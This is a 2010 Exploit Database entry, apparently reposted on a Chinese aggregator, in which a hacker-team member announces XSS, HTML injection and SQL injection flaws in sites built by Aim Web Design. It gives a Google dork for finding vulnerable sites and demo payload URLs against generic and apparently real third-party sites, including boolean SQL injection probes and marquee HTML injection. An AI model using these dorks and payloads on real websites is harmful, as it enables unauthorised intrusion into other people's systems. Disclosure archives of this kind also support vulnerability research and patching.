Aim Web Design – Multiple Vulnerabilities

• Exploit Database
• 31 阅读

• 作者： XroGuE
  日期： 2010-05-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12791/

• =======================================================================
  # Aim Web Design Multiple Vulnerabilities
  =======================================================================
  1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  0 _ __ __ __ 1
  1 /' \ __ /'__`\ /\ \__ /'__`\ 0
  0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
  1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
  0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
  1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
  0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
  1 \ \____/ >> Exploit database separated by exploit 0
  0 \/___/ type (local, remote, DoS, etc.) 1
  1 1
  0 [+] Site : Inj3ct0r.com 0
  1 [+] Support e-mail : submit[at]inj3ct0r.com 1
  0 0
  1 #################################### 1
  0 I'm XroGuE member from Inj3ct0r Team 1
  1 #################################### 0
  0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
  
  ########################################################################
  # Name: Aim Web Design Multiple Vulnerabilities
  # Vendor: www.aimwebdesigncheshire.co.uk
  # Date: 2010-05-29
  # Author: XroGuE
  # Thanks to: Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
  # Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
  # Home: (-_+)
  ########################################################################
  
  [+] Dork: inurl:"clubpage.php?id=" & inurl:"coursepage.php?id="
  intext:"Web Site design by : Aim Web Design Cheshire"
  
  
  [+] Vulnerabilities:
  
  newsarticle.php
  coursepage.php
  addreview.php
  clubpage.php
  
  
  [+] XSS InjecTion Vulnerability:
  
  [+] Demo: http://server/coursepage.php?id="
  http://www.2for1golfcourses.co.uk/addreview.php?id=">
  
  ########################################################################
  
  [+] HTML InjecTion Vulnerability:
  
  [+] Demo: http://server/coursepage.php?id="<marquee><font color=Blue size=15>XroGuE</font></marquee>
  http://www.2for1golfcourses.co.uk/addreview.php?id="><marquee><font color=Blue size=15>XroGuE</font></marquee>
  
  ########################################################################
  
  [+] SQL InjecTion Vulnerability:
  
  [+] Demo: http://server/newsarticle.php?id=10 and 1=1 [and 1=2]
  http://www.golfgreenfees.com/courses/courses/clubpage.php?id=30 and 1=1 [and 1=2]
  
  ########################################################################